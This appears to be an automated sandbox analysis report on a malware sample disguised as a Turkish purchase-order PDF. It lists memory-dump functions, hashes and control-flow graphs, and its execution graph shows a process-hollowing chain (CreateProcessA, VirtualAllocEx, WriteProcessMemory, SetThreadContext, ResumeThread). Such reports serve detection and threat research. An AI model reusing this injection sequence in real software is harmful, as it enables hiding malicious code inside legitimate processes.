                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: e0920b6b65acdad99f733cd549621fd9bbbc84ec66e5ab04484bd281ce245dd5
                                • Instruction ID: c9eb8acc68079dd89459987597889af5a8649485e852a560c3a461ec357a8406
                                • Opcode Fuzzy Hash: e0920b6b65acdad99f733cd549621fd9bbbc84ec66e5ab04484bd281ce245dd5
                                • Instruction Fuzzy Hash: 7B1100B58002498FDB60CFAAD944BDEBBF4EB48324F24846AD559A7710C374A944CFA1
                                Function 0617DA01 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,0617D9DD), ref: 0617DA67
                                Memory Dump Source
                                • Source File: 00000009.00000002.2549221235.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_6170000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 76322ddcd7250e740a5dab6b9fcf9efe4e7ad2ac71761bd4da9db4c49961e6d3
                                • Instruction ID: 1c5bc022f2620847a6a824e1d6bb66b982bd11ae25e09e93ed13436e792d7b82
                                • Opcode Fuzzy Hash: 76322ddcd7250e740a5dab6b9fcf9efe4e7ad2ac71761bd4da9db4c49961e6d3
                                • Instruction Fuzzy Hash: A21100B5C00249CFDB60CF9AD944BDEBBF4BF48324F24841AD559A7250C374A544CFA1
                                Function 028ED01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: abbe984dbd15770f7daba0c5bd544c345d55de9b48c535c9cc2a147a9bc75f1a
                                • Instruction ID: 07c42e4174e2b14192b14fd3da143dd4861f68f390a36452c336f0cae7cd2e1e
                                • Opcode Fuzzy Hash: abbe984dbd15770f7daba0c5bd544c345d55de9b48c535c9cc2a147a9bc75f1a
                                • Instruction Fuzzy Hash: CB21D079604204DFDF14DF10D984B26BB69EB89318F28C569D84A8B256C33AD45BCA62
                                Function 028ED104 Relevance: .1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c2955890d58e42ab8c701d580b327f5f0bfd85828566ef0c299d537d048ab5b
                                • Instruction ID: 24656dae06f4e167cddeaed6a920b27feb3a762dcbc2c9f23d2b2e4e00eb1e3b
                                • Opcode Fuzzy Hash: 7c2955890d58e42ab8c701d580b327f5f0bfd85828566ef0c299d537d048ab5b
                                • Instruction Fuzzy Hash: B821C27D504204EFDF04DF10D9C4B26FB69EB89218F20C56DE90A8B256C33AD44ACA61
                                Function 028ED006 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: efea3c08936a00b7e605333b9246a899184274c5c69618a9a9aceb76a5f0217f
                                • Instruction ID: 795ea33e76d0e8481e65cc184ed14fb27e6c442512700f73d7fc73a452ef33da
                                • Opcode Fuzzy Hash: efea3c08936a00b7e605333b9246a899184274c5c69618a9a9aceb76a5f0217f
                                • Instruction Fuzzy Hash: 312150795483809FCB02CF14D994715BF75EB46314F28C5EAD8498F2A7C33A985ACB62
                                Function 028ED0FF Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000009.00000002.2544124107.00000000028ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 028ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_28ed000_baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a7f8a936f404c2f3a1d37781fb358592a8c8b0a691fbc29600f85b803e49f347
                                • Instruction ID: d217663c31f1ec500f77eff6f3a4bccca4a071af285f2d8c2c8b5b05e70fa63e
                                • Opcode Fuzzy Hash: a7f8a936f404c2f3a1d37781fb358592a8c8b0a691fbc29600f85b803e49f347
                                • Instruction Fuzzy Hash: B411DD79504280CFCB05CF10C9C4B15FFA1FB89318F24C6ADD84A8B656C33AD44ACB51

                                Execution Graph

                                Execution Coverage:9.4%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:173
                                Total number of Limit Nodes:13
                                execution_graph 26903 158ad38 26907 158ae30 26903->26907 26915 158ae21 26903->26915 26904 158ad47 26908 158ae41 26907->26908 26909 158ae64 26907->26909 26908->26909 26923 158b0c8 26908->26923 26927 158b0b8 26908->26927 26909->26904 26910 158ae5c 26910->26909 26911 158b068 GetModuleHandleW 26910->26911 26912 158b095 26911->26912 26912->26904 26916 158ae41 26915->26916 26917 158ae64 26915->26917 26916->26917 26921 158b0c8 LoadLibraryExW 26916->26921 26922 158b0b8 LoadLibraryExW 26916->26922 26917->26904 26918 158ae5c 26918->26917 26919 158b068 GetModuleHandleW 26918->26919 26920 158b095 26919->26920 26920->26904 26921->26918 26922->26918 26924 158b0dc 26923->26924 26925 158b101 26924->26925 26931 158a870 26924->26931 26925->26910 26928 158b0dc 26927->26928 26929 158a870 LoadLibraryExW 26928->26929 26930 158b101 26928->26930 26929->26930 26930->26910 26932 158b2a8 LoadLibraryExW 26931->26932 26934 158b321 26932->26934 26934->26925 26935 158d0b8 26936 158d0b9 GetCurrentProcess 26935->26936 26938 158d149 26936->26938 26939 158d150 GetCurrentThread 26936->26939 26938->26939 26940 158d18d GetCurrentProcess 26939->26940 26941 158d186 26939->26941 26942 158d1c3 26940->26942 26941->26940 26943 158d1eb GetCurrentThreadId 26942->26943 26944 158d21c 26943->26944 26954 1584668 26955 158467a 26954->26955 26956 1584686 26955->26956 26958 1584779 26955->26958 26959 158479d 26958->26959 26963 1584878 26959->26963 26967 1584888 26959->26967 26964 15848af 26963->26964 26966 158498c 26964->26966 26971 158449c 26964->26971 26969 15848af 26967->26969 26968 158498c 26969->26968 26970 158449c CreateActCtxA 26969->26970 26970->26968 26972 1585918 CreateActCtxA 26971->26972 26974 15859db 26972->26974 26900 158d300 26901 158d301 DuplicateHandle 26900->26901 26902 158d396 26901->26902 26975 66f7c56 26976 66f7be4 26975->26976 26977 66f7c59 26975->26977 26986 66f7c12 26976->26986 26994 66f84ef 26976->26994 26999 66f8890 26976->26999 27004 66f81f7 26976->27004 27008 66f86bc 26976->27008 27013 66f81bd 26976->27013 27018 66f8483 26976->27018 27024 66f8123 26976->27024 27029 66f83c6 26976->27029 27033 66f8107 26976->27033 27038 66f8129 26976->27038 27043 66f81aa 26976->27043 27052 66f802b 26976->27052 27057 66f884b 26976->27057 27062 66f85ab 26976->27062 27066 66f82cc 26976->27066 26995 66f8637 26994->26995 27071 66f5e58 26995->27071 27075 66f5e50 26995->27075 26996 66f8652 27000 66f8896 26999->27000 27001 66f88b9 27000->27001 27079 66f6518 27000->27079 27083 66f6510 27000->27083 27087 66f6368 27004->27087 27091 66f6360 27004->27091 27005 66f8227 27005->26986 27010 66f80fd 27008->27010 27009 66f810f 27010->27008 27010->27009 27096 66f6428 27010->27096 27100 66f6421 27010->27100 27015 66f80fd 27013->27015 27014 66f810f 27015->27014 27016 66f6428 WriteProcessMemory 27015->27016 27017 66f6421 WriteProcessMemory 27015->27017 27016->27015 27017->27015 27019 66f8152 27018->27019 27020 66f851d 27019->27020 27104 66f5da8 27019->27104 27108 66f5da0 27019->27108 27020->26986 27021 66f8167 27021->26986 27025 66f80fd 27024->27025 27026 66f810f 27025->27026 27027 66f6428 WriteProcessMemory 27025->27027 27028 66f6421 WriteProcessMemory 27025->27028 27027->27025 27028->27025 27031 66f6428 WriteProcessMemory 27029->27031 27032 66f6421 WriteProcessMemory 27029->27032 27030 66f83f4 27031->27030 27032->27030 27034 66f80fd 27033->27034 27035 66f810f 27034->27035 27036 66f6428 WriteProcessMemory 27034->27036 27037 66f6421 WriteProcessMemory 27034->27037 27036->27034 27037->27034 27039 66f8152 27038->27039 27041 66f5da8 ResumeThread 27039->27041 27042 66f5da0 ResumeThread 27039->27042 27040 66f8167 27040->26986 27041->27040 27042->27040 27044 66f81b7 27043->27044 27046 66f82f5 27043->27046 27044->27046 27112 66f8c61 27044->27112 27117 66f8c70 27044->27117 27045 66f8a8a 27046->27045 27050 66f6518 ReadProcessMemory 27046->27050 27051 66f6510 ReadProcessMemory 27046->27051 27047 66f88b9 27047->27047 27050->27047 27051->27047 27053 66f804a 27052->27053 27122 66f66b0 27053->27122 27126 66f66a4 27053->27126 27058 66f82f6 27057->27058 27060 66f6518 ReadProcessMemory 27058->27060 27061 66f6510 ReadProcessMemory 27058->27061 27059 66f88b9 27060->27059 27061->27059 27064 66f6428 WriteProcessMemory 27062->27064 27065 66f6421 WriteProcessMemory 27062->27065 27063 66f85cf 27064->27063 27065->27063 27067 66f82f5 27066->27067 27069 66f6518 ReadProcessMemory 27067->27069 27070 66f6510 ReadProcessMemory 27067->27070 27068 66f88b9 27069->27068 27070->27068 27072 66f5e9d Wow64SetThreadContext 27071->27072 27074 66f5ee5 27072->27074 27074->26996 27076 66f5e58 Wow64SetThreadContext 27075->27076 27078 66f5ee5 27076->27078 27078->26996 27080 66f6563 ReadProcessMemory 27079->27080 27082 66f65a7 27080->27082 27082->27001 27084 66f6518 ReadProcessMemory 27083->27084 27086 66f65a7 27084->27086 27086->27001 27088 66f63a8 VirtualAllocEx 27087->27088 27090 66f63e5 27088->27090 27090->27005 27092 66f6366 VirtualAllocEx 27091->27092 27093 66f62f7 27091->27093 27095 66f63e5 27092->27095 27093->27005 27095->27005 27097 66f6470 WriteProcessMemory 27096->27097 27099 66f64c7 27097->27099 27099->27010 27101 66f6470 WriteProcessMemory 27100->27101 27103 66f64c7 27101->27103 27103->27010 27105 66f5de8 ResumeThread 27104->27105 27107 66f5e19 27105->27107 27107->27021 27109 66f5de8 ResumeThread 27108->27109 27111 66f5e19 27109->27111 27111->27021 27113 66f8c70 27112->27113 27115 66f5e58 Wow64SetThreadContext 27113->27115 27116 66f5e50 Wow64SetThreadContext 27113->27116 27114 66f8c9b 27114->27046 27115->27114 27116->27114 27118 66f8c85 27117->27118 27120 66f5e58 Wow64SetThreadContext 27118->27120 27121 66f5e50 Wow64SetThreadContext 27118->27121 27119 66f8c9b 27119->27046 27120->27119 27121->27119 27123 66f6739 CreateProcessA 27122->27123 27125 66f68fb 27123->27125 27125->27125 27127 66f66b0 CreateProcessA 27126->27127 27129 66f68fb 27127->27129 26945 66f8e00 26946 66f8f8b 26945->26946 26947 66f8e26 26945->26947 26947->26946 26950 66f9078 PostMessageW 26947->26950 26952 66f9080 PostMessageW 26947->26952 26951 66f90ec 26950->26951 26951->26947 26953 66f90ec 26952->26953 26953->26947

                                Executed Functions

                                Function 05AFCBC0 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 58 5afcbc0-5afcbe8 59 5afcbef-5afcc2f 58->59 60 5afcbea 58->60 61 5afcc30 59->61 60->59 62 5afcc37-5afcc53 61->62 63 5afcc5c-5afcc5d 62->63 64 5afcc55 62->64 81 5afcf35-5afcf3e 63->81 64->61 64->63 65 5afce89-5afce92 64->65 66 5afcd47-5afcd5a 64->66 67 5afcee7-5afcefd 64->67 68 5afcca6-5afccbb 64->68 69 5afcc62-5afcc66 64->69 70 5afcf02-5afcf19 64->70 71 5afccc0-5afccd7 64->71 72 5afcd5f-5afcd78 64->72 73 5afcf1e-5afcf30 64->73 74 5afcd7d-5afcd94 64->74 75 5afcddd-5afcdf0 64->75 76 5afccdc-5afccef 64->76 77 5afce58-5afce6d 64->77 78 5afce97-5afcebd call 5afc318 64->78 79 5afcc96-5afcca4 64->79 80 5afcdf5-5afce53 call 5afc6a8 64->80 64->81 82 5afccf4-5afcd0b 64->82 83 5afce72-5afce84 64->83 84 5afcd10-5afcd14 64->84 65->62 66->62 67->62 68->62 89 5afcc79-5afcc80 69->89 90 5afcc68-5afcc77 69->90 70->62 71->62 72->62 73->62 96 5afcd9e-5afcdd8 74->96 75->62 76->62 77->62 97 5afcec7-5afcee2 78->97 79->62 80->62 82->62 83->62 86 5afcd27-5afcd2e 84->86 87 5afcd16-5afcd25 84->87 94 5afcd35-5afcd42 86->94 87->94 91 5afcc87-5afcc94 89->91 90->91 91->62 94->62 96->62 97->62
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: UJ$yO6
                                • API String ID: 0-870398751
                                • Opcode ID: 96701c9f9be9db6ad559b3b17e33db90bc8d83555692f55ac6e680b0722fc110
                                • Instruction ID: af6b438b0b9ae2c64936a6b9e7e85569e0e7de25fcac1df72d5156282b102997
                                • Opcode Fuzzy Hash: 96701c9f9be9db6ad559b3b17e33db90bc8d83555692f55ac6e680b0722fc110
                                • Instruction Fuzzy Hash: 8BB10470E0921DDFCB18CFE6D99099EFBB2BF89310F10952AE515AB264DB349906CF44
                                Function 05AFC000 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 102 5afc000-5afc025 103 5afc02c-5afc05d 102->103 104 5afc027 102->104 105 5afc05e 103->105 104->103 106 5afc065-5afc081 105->106 107 5afc08a-5afc08b 106->107 108 5afc083 106->108 109 5afc2af-5afc2b8 107->109 108->105 108->107 108->109 110 5afc1ac-5afc1c1 108->110 111 5afc268-5afc28f 108->111 112 5afc1c6-5afc1d4 108->112 113 5afc0a5-5afc0bc 108->113 114 5afc222-5afc234 108->114 115 5afc0be-5afc0d1 108->115 116 5afc0fd-5afc101 108->116 117 5afc17b-5afc181 call 5afa90c 108->117 118 5afc239-5afc24b 108->118 119 5afc1d9-5afc1f1 108->119 120 5afc1f6-5afc21d 108->120 121 5afc134-5afc176 108->121 122 5afc294-5afc2aa 108->122 123 5afc090-5afc0a3 108->123 124 5afc250-5afc263 108->124 110->106 111->106 112->106 113->106 114->106 125 5afc0e4-5afc0eb 115->125 126 5afc0d3-5afc0e2 115->126 127 5afc114-5afc11b 116->127 128 5afc103-5afc112 116->128 130 5afc187-5afc1a7 117->130 118->106 119->106 120->106 121->106 122->106 123->106 124->106 131 5afc0f2-5afc0f8 125->131 126->131 133 5afc122-5afc12f 127->133 128->133 130->106 131->106 133->106
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: !>c8$%)Y
                                • API String ID: 0-2922296349
                                • Opcode ID: 53a626d87d6b651c908abbf931b1f8e5c70bfd2983b6034aeed70f645cb0a482
                                • Instruction ID: 4d91a4afde48cea9f1cc4be702ca44171b57cc15160975799f3dcd80e2d44168
                                • Opcode Fuzzy Hash: 53a626d87d6b651c908abbf931b1f8e5c70bfd2983b6034aeed70f645cb0a482
                                • Instruction Fuzzy Hash: C281E571D0920D9FCB08CFE6E59199EFBB2FF89710F10942AE515AB224DB309942DF54
                                Function 0158D0A8 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0158D136
                                • GetCurrentThread.KERNEL32 ref: 0158D173
                                • GetCurrentProcess.KERNEL32 ref: 0158D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0158D209
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 4860de130a884ea6dcb8405ac42073167a6e5f4fe64e5e891e262949ee118fd9
                                • Instruction ID: e2786c78aba9e39986952e2c4213f218a9ff5bb68c08200b5244e3443f5a9a0c
                                • Opcode Fuzzy Hash: 4860de130a884ea6dcb8405ac42073167a6e5f4fe64e5e891e262949ee118fd9
                                • Instruction Fuzzy Hash: 7A5166B09013498FDB54DFAAD948BDEBBF1BF48314F208469D049AB3A1DB349944CB65
                                Function 0158D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0158D136
                                • GetCurrentThread.KERNEL32 ref: 0158D173
                                • GetCurrentProcess.KERNEL32 ref: 0158D1B0
                                • GetCurrentThreadId.KERNEL32 ref: 0158D209
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 4c41e86cbc9df8d2b62aaf8c287400054a38ff704b1dc221ce06b2a9385d959a
                                • Instruction ID: 18d7c60bd9878769d0694572eb13388ef11908a42369bb4a5847abfb79634a01
                                • Opcode Fuzzy Hash: 4c41e86cbc9df8d2b62aaf8c287400054a38ff704b1dc221ce06b2a9385d959a
                                • Instruction Fuzzy Hash: A15155B09013098FDB54DFAAD948BDEBBF1BF88314F208469E049AB290DB749944CB65
                                Function 066F5E50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 47 66f5e50-66f5ea3 50 66f5ea5-66f5eb1 47->50 51 66f5eb3-66f5ee3 Wow64SetThreadContext 47->51 50->51 53 66f5eec-66f5f1c 51->53 54 66f5ee5-66f5eeb 51->54 54->53
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066F5ED6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID: n
                                • API String ID: 983334009-2013832146
                                • Opcode ID: ecfd8ec2945016b867494d69b437c1cbf2600eca6d9e0c417c9731850cb7de59
                                • Instruction ID: 5b9e21fe3a04358c88e15a75e6063ffc406f5ffad4c71987b250665941668b64
                                • Opcode Fuzzy Hash: ecfd8ec2945016b867494d69b437c1cbf2600eca6d9e0c417c9731850cb7de59
                                • Instruction Fuzzy Hash: 2B218771D003489FDB50DFAAC485BEEBBF4EF88314F14842AD559A7241CBB89984CFA4
                                Function 066F66A4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 137 66f66a4-66f6745 140 66f677e-66f679e 137->140 141 66f6747-66f6751 137->141 148 66f67d7-66f6806 140->148 149 66f67a0-66f67aa 140->149 141->140 142 66f6753-66f6755 141->142 143 66f6778-66f677b 142->143 144 66f6757-66f6761 142->144 143->140 146 66f6765-66f6774 144->146 147 66f6763 144->147 146->146 150 66f6776 146->150 147->146 157 66f683f-66f68f9 CreateProcessA 148->157 158 66f6808-66f6812 148->158 149->148 151 66f67ac-66f67ae 149->151 150->143 152 66f67d1-66f67d4 151->152 153 66f67b0-66f67ba 151->153 152->148 155 66f67be-66f67cd 153->155 156 66f67bc 153->156 155->155 159 66f67cf 155->159 156->155 169 66f68fb-66f6901 157->169 170 66f6902-66f6988 157->170 158->157 160 66f6814-66f6816 158->160 159->152 162 66f6839-66f683c 160->162 163 66f6818-66f6822 160->163 162->157 164 66f6826-66f6835 163->164 165 66f6824 163->165 164->164 167 66f6837 164->167 165->164 167->162 169->170 180 66f698a-66f698e 170->180 181 66f6998-66f699c 170->181 180->181 182 66f6990 180->182 183 66f699e-66f69a2 181->183 184 66f69ac-66f69b0 181->184 182->181 183->184 187 66f69a4 183->187 185 66f69b2-66f69b6 184->185 186 66f69c0-66f69c4 184->186 185->186 188 66f69b8 185->188 189 66f69d6-66f69dd 186->189 190 66f69c6-66f69cc 186->190 187->184 188->186 191 66f69df-66f69ee 189->191 192 66f69f4 189->192 190->189 191->192 194 66f69f5 192->194 194->194
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066F68E6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 842677f212ac0fa25d4a5879d0b660b534665b52e8c0390cd9912fe00ba6ba35
                                • Instruction ID: 6e33036ca553c51250d0c58063ea47a18a7c066fb0d065a569bcaf96634ab3cc
                                • Opcode Fuzzy Hash: 842677f212ac0fa25d4a5879d0b660b534665b52e8c0390cd9912fe00ba6ba35
                                • Instruction Fuzzy Hash: AFA16971D102199FEB60CFA8C841BEEBBB2FF48300F1485A9E919E7244DB749985CF91
                                Function 066F66B0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 195 66f66b0-66f6745 197 66f677e-66f679e 195->197 198 66f6747-66f6751 195->198 205 66f67d7-66f6806 197->205 206 66f67a0-66f67aa 197->206 198->197 199 66f6753-66f6755 198->199 200 66f6778-66f677b 199->200 201 66f6757-66f6761 199->201 200->197 203 66f6765-66f6774 201->203 204 66f6763 201->204 203->203 207 66f6776 203->207 204->203 214 66f683f-66f68f9 CreateProcessA 205->214 215 66f6808-66f6812 205->215 206->205 208 66f67ac-66f67ae 206->208 207->200 209 66f67d1-66f67d4 208->209 210 66f67b0-66f67ba 208->210 209->205 212 66f67be-66f67cd 210->212 213 66f67bc 210->213 212->212 216 66f67cf 212->216 213->212 226 66f68fb-66f6901 214->226 227 66f6902-66f6988 214->227 215->214 217 66f6814-66f6816 215->217 216->209 219 66f6839-66f683c 217->219 220 66f6818-66f6822 217->220 219->214 221 66f6826-66f6835 220->221 222 66f6824 220->222 221->221 224 66f6837 221->224 222->221 224->219 226->227 237 66f698a-66f698e 227->237 238 66f6998-66f699c 227->238 237->238 239 66f6990 237->239 240 66f699e-66f69a2 238->240 241 66f69ac-66f69b0 238->241 239->238 240->241 244 66f69a4 240->244 242 66f69b2-66f69b6 241->242 243 66f69c0-66f69c4 241->243 242->243 245 66f69b8 242->245 246 66f69d6-66f69dd 243->246 247 66f69c6-66f69cc 243->247 244->241 245->243 248 66f69df-66f69ee 246->248 249 66f69f4 246->249 247->246 248->249 251 66f69f5 249->251 251->251
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066F68E6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 42fd9beddb99df19573dbfe68508cfaff8937739de7af4a5ac39d0fe0a2559ab
                                • Instruction ID: d8477c2f5977eec63719cfb35290f0e61a751356817a3f1226b60dfd3782539f
                                • Opcode Fuzzy Hash: 42fd9beddb99df19573dbfe68508cfaff8937739de7af4a5ac39d0fe0a2559ab
                                • Instruction Fuzzy Hash: 6C916871D1021A9FEB50CFA8C841BEEBBB2FF48300F1485A9E919E7244DB749985CF91
                                Function 0158AE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 252 158ae30-158ae3f 253 158ae6b-158ae6f 252->253 254 158ae41-158ae4e call 1589838 252->254 255 158ae71-158ae7b 253->255 256 158ae83-158aec4 253->256 261 158ae50 254->261 262 158ae64 254->262 255->256 263 158aed1-158aedf 256->263 264 158aec6-158aece 256->264 307 158ae56 call 158b0c8 261->307 308 158ae56 call 158b0b8 261->308 262->253 266 158aee1-158aee6 263->266 267 158af03-158af05 263->267 264->263 265 158ae5c-158ae5e 265->262 268 158afa0-158b060 265->268 270 158aee8-158aeef call 158a814 266->270 271 158aef1 266->271 269 158af08-158af0f 267->269 302 158b068-158b093 GetModuleHandleW 268->302 303 158b062-158b065 268->303 273 158af1c-158af23 269->273 274 158af11-158af19 269->274 272 158aef3-158af01 270->272 271->272 272->269 276 158af30-158af39 call 158a824 273->276 277 158af25-158af2d 273->277 274->273 283 158af3b-158af43 276->283 284 158af46-158af4b 276->284 277->276 283->284 285 158af69-158af6d 284->285 286 158af4d-158af54 284->286 289 158af73-158af76 285->289 286->285 288 158af56-158af66 call 158a834 call 158a844 286->288 288->285 292 158af78-158af96 289->292 293 158af99-158af9f 289->293 292->293 304 158b09c-158b0b0 302->304 305 158b095-158b09b 302->305 303->302 305->304 307->265 308->265
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B086
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: a390e6897c98130f74a93070e8685afff54b9b4ac505048f5c0ddb1e15037378
                                • Instruction ID: 8d624f3f5284cd763c27ce507318fc10b47d7e9adab5712a8a53d8cde7dad0da
                                • Opcode Fuzzy Hash: a390e6897c98130f74a93070e8685afff54b9b4ac505048f5c0ddb1e15037378
                                • Instruction Fuzzy Hash: 478137B0A00B068FD724EF6AD44475ABBF1FF88304F10892ED496EBA50D775E846CB91
                                Function 0158449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 309 158449c-15859d9 CreateActCtxA 312 15859db-15859e1 309->312 313 15859e2-1585a3c 309->313 312->313 320 1585a4b-1585a4f 313->320 321 1585a3e-1585a41 313->321 322 1585a60 320->322 323 1585a51-1585a5d 320->323 321->320 324 1585a61 322->324 323->322 324->324
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 5cffb25e099e8e826ab8146fd63bf950a56a8771be57cbfa1b1a98be51ac766c
                                • Instruction ID: 4331dd95098984fce263a32346cb04f674ac8b7cfde7d348bcc7b77785a7d0fc
                                • Opcode Fuzzy Hash: 5cffb25e099e8e826ab8146fd63bf950a56a8771be57cbfa1b1a98be51ac766c
                                • Instruction Fuzzy Hash: BD41F270C11718CBDB24DFAAC884B9EBBF1BF49304F20806AD408AB251DBB16985CF90
                                Function 0158590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 326 158590c-158590f 327 158591c-15859d9 CreateActCtxA 326->327 329 15859db-15859e1 327->329 330 15859e2-1585a3c 327->330 329->330 337 1585a4b-1585a4f 330->337 338 1585a3e-1585a41 330->338 339 1585a60 337->339 340 1585a51-1585a5d 337->340 338->337 341 1585a61 339->341 340->339 341->341
